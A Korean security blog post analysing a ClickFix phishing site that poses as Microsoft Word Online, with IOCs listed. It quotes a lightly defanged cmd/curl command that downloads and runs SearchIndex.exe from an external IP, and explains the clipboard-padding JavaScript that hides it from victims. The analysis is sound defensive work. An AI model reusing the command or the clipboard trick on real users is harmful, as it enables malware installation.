꿈을꾸는 파랑새

오늘은 마이크로소프트 온라인 워드 사칭 ClickFix 공격 사이트 분석을 해보는 시간을 가져 보겠습니다.
해당 클릭픽스(ClickFix) 사이트는 Microsoft Word Online인 것처럼 꾸미는 것이 특징입니다.
여기서 The "Word Online" extension is not installed in your browser. To view the document offline, click the "How to fix" button. 이라는 부분처럼 How to fix 부분을 누르게 되면 다음과 같은 코드들이 실행합니다.
 const hiddenPart = 'cmd (/)c start "" /min curl -s -o %APPDATA%\\SearchIndex(.)exe hxxp://193(.)233(.)19(.)134/page && start /min %APPDATA%\\SearchIndex(.)exe';
.....
자세하게 확인을 하고 싶으며 웹 소스를 열어 보면 자세하게 확인을 할 수가 있습니다.
여기서 안내를 하는 것처럼 윈도우 키+R를 눌러서 실행하게 되면 악성코드가 다운로드 및 실행이 됩니다.

마이크로소프트 워드 클릭픽스 공격
마이크로소프트 워드 클릭픽스 공격

분석

cmd.exe 실행->Windows curl.exe 사용을 하면 간단하게 실행->지정된 외부 서버에서 파일 내려받기->%APPDATA%\SearchIndex.exe로 저장->다운로드된 실행 파일을 간소하게 실행
SearchIndex.exe라는 이름은 Windows 검색 인덱싱 구성요소처럼 보이게 위장을 하고 있음
저장 위치
C:\Users\(사용자명)\AppData\Roaming\SearchIndex.exe

다운로드 주소

hxxp://193(.)233(.)19(.)134/page

웹소스에 포함된 악성명령어
웹소스에 포함된 악성명령어

여기서 핵심 자바스크립트는 다음과 같습니다.
const fullClipboard = hiddenPart + padding + visiblePart;
hiddenPart 뒤에 대량의 공백인 padding을 삽입하고 그 뒤에 정상적인 CAPTCHA 안내문처럼 보이는 visiblePart를 이어 붙여 하나의 클립보드 문자열인 fullClipboard를 생성하는 코드이며 악의적인 명령을 실행하기 위해서 화면에서 잘 보이지 않게 만들면서 사용자가 뒤쪽의 정상적인 안내문만 확인만 할 수가 있게 만들어져 있습니다.
navigator.clipboard.writeText() 부분을 악용하고 있음
사용자의 시스템 클립보드에 복사하는 JavaScript 기능
여기서는 "How to fix" button.버튼을 눌렀을 때 악의적인 명령을 실제 클립보드에 저장되도록 하는 핵심 역할을 하는 하고 있습니다.
현재 글을 쓰는 시점에서는 악성코드 다운로드가 이루어지지 않는 상황
IOCs
docs163(.)com
193.233.19(.)134
hxxp://193.233.19(.)134/page
쉽게 이야기하면 클릭팩스(ClickFix)사이트는 활성화 상태 하지만 악성코드 다운로드 사이트는 비활성화 상태입니다.

공유하기

facebook twitter kakaoTalk kakaostory naver band